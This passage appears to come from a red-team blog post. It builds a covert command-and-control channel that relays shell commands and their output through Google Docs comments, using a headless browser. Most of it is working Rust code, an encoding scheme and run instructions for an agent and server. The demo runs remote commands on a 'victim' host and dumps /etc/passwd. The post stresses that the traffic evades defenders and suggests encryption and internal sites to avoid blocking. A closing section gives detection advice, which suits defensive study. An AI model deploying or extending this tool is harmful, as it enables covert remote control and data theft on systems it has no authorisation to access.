Reading comments from the document
Next, we want to read the comments from the document. The agent needs this functionality to receive commands from the C2 server, and the server needs it to receive the output of the commands executed by the agent.
Reading all comments from the document is quite straightforward because all comments are stored in a div with the class docos-replyview-body. Using the CDP, we can find all elements with this class and read the text of the comments:
let mut comments = Vec::new();
for comment in page
    .find_elements("div.docos-replyview-body")
    .await?
    .into_iter()
{
    if let Some(comment) = comment.inner_text().await? {
        comments.push(comment);
    }
}
This is also implemented in src/lib.rs. An example of how to use the library to read all comments from the document can be found in examples/read_comments.rs and can be run using the following command:
$ cargo run --example read_comments
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
[examples/read_comments.rs:11:5] c2.read_all_comments().await? = [
"Hello, World!",
]
We can see that the comment “Hello, World!” that we added earlier is returned by the function.
Encoding data in comments
Now that we have the necessary abstractions to send and receive data “through” the document, we need to specify an encoding that the agent and the server will use to encode and decode the data.
For this PoC, we will be executing shell commands on the agent and returning the output to the server, so not much encoding is required. We only need a way to indicate whether a comment is a command or the output of a command. In production, you would probably want to use a more sophisticated encoding and layer some kind of public key cryptography on top of it to ensure that only the C2 server can issue commands (signed with its private key) and that only the server can read the output of the commands (encrypted with its public key).
All messages are hex encoded. The first byte of the message indicates if the message is a command (0x01) or the output of a command (0x02). The next 12 bytes of the message are the message ID, which is used to match the output of a command to the command itself. The 0x01 (command) message is then followed by the command, and the 0x02 (output) message is followed by the output of the command with the corresponding message ID. We also add a third message type, 0x03, which is used to indicate that the agent should exit.
All in all, the encoding is specified by these Rust types with some convenience functions to encode and decode the messages implemented in src/shell.rs:
#[repr(u8)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub enum MessageType {
    Command = 0x01,
    Output = 0x02,
    Exit = 0x03,
}

#[derive(Debug, Clone, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub struct Message {
    pub message_type: MessageType,
    pub message_id: [u8; 12],
    pub message: String,
}
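To make the wire format concrete, here is a minimal sketch of how encoding and decoding could look. It is not the code from src/shell.rs: the method names encode and decode are our own for this illustration, the types are repeated (with fewer derives) only so the snippet stands alone, and we assume that the type byte, the 12-byte ID and the UTF-8 payload are concatenated and then hex encoded as a whole.

```rust
#[repr(u8)]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum MessageType {
    Command = 0x01,
    Output = 0x02,
    Exit = 0x03,
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Message {
    pub message_type: MessageType,
    pub message_id: [u8; 12],
    pub message: String,
}

impl Message {
    /// Hypothetical helper: type byte, then 12-byte ID, then UTF-8 payload,
    /// all rendered as lowercase hex.
    pub fn encode(&self) -> String {
        let mut bytes = vec![self.message_type as u8];
        bytes.extend_from_slice(&self.message_id);
        bytes.extend_from_slice(self.message.as_bytes());
        let mut hex = String::with_capacity(bytes.len() * 2);
        for b in bytes {
            hex.push_str(&format!("{:02x}", b));
        }
        hex
    }

    /// Hypothetical helper: returns None for anything that is not a
    /// well-formed message (bad hex, too short, unknown type, invalid UTF-8).
    pub fn decode(hex: &str) -> Option<Message> {
        if hex.len() % 2 != 0 || !hex.bytes().all(|b| b.is_ascii_hexdigit()) {
            return None;
        }
        let bytes = (0..hex.len())
            .step_by(2)
            .map(|i| u8::from_str_radix(&hex[i..i + 2], 16).ok())
            .collect::<Option<Vec<u8>>>()?;
        // One type byte plus twelve ID bytes is the minimum length.
        if bytes.len() < 13 {
            return None;
        }
        let message_type = match bytes[0] {
            0x01 => MessageType::Command,
            0x02 => MessageType::Output,
            0x03 => MessageType::Exit,
            _ => return None,
        };
        let mut message_id = [0u8; 12];
        message_id.copy_from_slice(&bytes[1..13]);
        let message = String::from_utf8(bytes[13..].to_vec()).ok()?;
        Some(Message { message_type, message_id, message })
    }
}
```

Returning None on malformed input matters here because the document may contain ordinary comments (such as the “Hello, World!” test comment) that are not messages at all and should simply be skipped.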
Putting it all together
We now have the required abstractions to interact with Google Docs using the CDP and have defined an encoding for the messages. Let’s put it all together to create an agent and server pair that can be used to execute shell commands on the agent and receive the output of the commands.
The agent starts a headless browser and then enters a loop where it reads comments from the document, decodes them, executes the command, and then writes the output of the command back to the document.
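The “executes the command” step of that loop could be sketched as follows. This is an illustration only and may differ from what shell_agent.rs does: the function name run_shell is hypothetical, and we assume a Unix-like agent where commands are passed to sh -c and where stdout and stderr are simply concatenated into one reply.

```rust
use std::process::Command;

/// Hypothetical helper: run a command line through `sh -c` and return
/// stdout followed by stderr as a single string.
pub fn run_shell(command: &str) -> String {
    match Command::new("sh").arg("-c").arg(command).output() {
        Ok(out) => {
            let mut text = String::from_utf8_lossy(&out.stdout).into_owned();
            text.push_str(&String::from_utf8_lossy(&out.stderr));
            text
        }
        // Report spawn failures back to the operator instead of crashing the agent.
        Err(err) => format!("failed to run command: {}", err),
    }
}
```

Going through a shell rather than spawning the binary directly is what makes pipelines such as cat /etc/passwd | head work without any parsing on the agent side.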
The server asks the operator for a command, encodes it, and writes it to the document. It then waits for the output of the command, decodes it, and prints it for the operator. It can also send the special 0x03 message to the agent to make it exit. We also added a few utility functions, such as clearing all comments from the document and displaying all comments that are already present.
The full code for the agent and server can be found in the examples directory of the repository, in shell_agent.rs and shell_server.rs respectively.
To run the example:
- Clone the repository (git clone https://github.com/cirosec/google-doc2).
- Create a new Google Docs document and share it with the “Anyone with the link can edit” permission.
- Type some text in the document so that it is not empty. If you want, you can keep the document open in your normal browser to see the comments being added.
- Set the “DOCS_URL” environment variable to the URL of the document and run the agent:
$ export DOCS_URL="https://docs.google.com/document/d/XXXXX/edit?usp=sharing"
$ cargo run --example shell_agent
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
Running `target/debug/examples/shell_agent`
- Run the server in another terminal and execute some commands, in this case hostname and cat /etc/passwd | head:
$ export DOCS_URL="https://docs.google.com/document/d/XXXXX/edit?usp=sharing"
$ cargo run --example shell_server
Finished `dev` profile [unoptimized + debuginfo] target(s) in 0.11s
Successfully opened Google Docs!
Choose an action: Submit a new command
Enter a command: hostname
-> victim
Choose an action: Submit a new command
Enter a command: cat /etc/passwd | head
-> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
Choose an action: Exit
As you can see, the server is able to send commands to the agent through the document, and the agent is able to execute them and send the output back to the server.
Blue Team Perspective
All C2 traffic generated by this technique is sent out by an unmodified browser executable. In the case of Microsoft Edge, the executable is even signed by Microsoft! This makes it very difficult for blue teamers to detect that something is up. Even if someone notices the channel, all traffic is sent “encoded” through the Google Docs API, which is not very straightforward to understand. As an example, here’s the POST request apparently responsible for adding a comment to the document:
POST /document/d/XXXXXXXX/docos/p/sync?id=XXXXXXXX&reqid=3&sid=XXXXXXXX&vc=1&c=1&w=1&flr=0&smv=52&smb=XXX
&token=XXXXX&includes_info_params=true&cros_files=false HTTP/2
Host: docs.google.com
[...]
p=%5B%5B%5B%22XXXXXXXX%22,%5Bnull,null,%5B%22text/html%22,%22
test%20comment%22%5D,%5B%22text/plain%22,%22test%20comment%22%5D,%5B%22
Anonym%22,null,%22//ssl.gstatic.com/docs/common/blue_silhouette96-0.png%22,%22ANONYMOUS_105250506097979753968%22,1%5D,1712922484034,1712922484034,
null,%5B%22text/plain%22,%22Hello,%20world!aa%22%5D,null,%22XXXXXXXX%22,1%5D,1712922484034,
null,null,null,null,%22kix.290cok7o9jiy%22,1%5D%5D,1712921888390%5D
The comment text is in there, but from a blue team perspective it seems very difficult to figure out what is going on based on that traffic alone, especially if the comment text is encrypted and obfuscated before being added to the document.
Additionally, this technique may be used with any other service that provides functionality similar to Google Docs. To detect this behavior more generally, we can instead focus on the way the agent launches the Chromium instance. This differs from normal execution of Chromium because the executable is started with at least the two flags --remote-debugging-port=0 and --headless that we discussed earlier. In practice, the library passes many more arguments, but only these two are strictly necessary. Therefore, if you’d like to build alerting for this type of C2 channel, we’d recommend alerting on processes of Chromium-based browsers (Chromium, Chrome, Edge, Brave and the like) that have either of these two flags present. During normal operation of Chromium, we haven’t seen these flags in use, but they are not malicious in themselves and may be used by developers running automated tests on web applications, so you might need to configure allowlists for developer machines as necessary.
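As a starting point, the detection logic could be sketched like this. It is a simplified illustration rather than a production rule: the function name, the list of executable name fragments and the substring matching are our own assumptions, and a real deployment would express the same idea in the query language of your EDR or SIEM.

```rust
/// Illustrative, non-exhaustive list of name fragments of Chromium-based browsers.
const BROWSER_NAMES: &[&str] = &["chrome", "chromium", "msedge", "brave"];

/// Hypothetical check: true if the process looks like a Chromium-based browser
/// that was started headless or with a remote debugging port.
pub fn is_suspicious_browser_launch(exe_path: &str, args: &[&str]) -> bool {
    // Take the file name after the last path separator (Unix or Windows style).
    let name = exe_path
        .rsplit(|c| c == '/' || c == '\\')
        .next()
        .unwrap_or(exe_path)
        .to_ascii_lowercase();
    let is_browser = BROWSER_NAMES.iter().any(|b| name.contains(*b));

    // Compare only the part before '=' so that values such as
    // `--remote-debugging-port=0` still match.
    let has_flag = args.iter().any(|arg| {
        let flag = arg.split('=').next().unwrap_or("");
        flag == "--headless" || flag == "--remote-debugging-port"
    });

    is_browser && has_flag
}
```

Substring matching on the executable name is deliberately broad and will also flag related tools whose names contain a browser name, so the allowlists mentioned above remain necessary.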
Conclusion
In this article, we demonstrated that it is possible to use a headless browser, normally already present on the target system, as a proxy for C2 communication. For the PoC we used Google Docs, but hopefully it is clear that any website can be used as a C2 proxy, as long as it can be used to transmit and receive data using the CDP. All the code for the PoC can be found on GitHub.
In practice, this technique should be built upon by adding a more sophisticated encoding and asymmetric encryption, and by choosing a website that fits the scenario of the red team engagement. For example, the website could be a company-internal website, which would make it even less likely to be blocked by any firewall or proxy.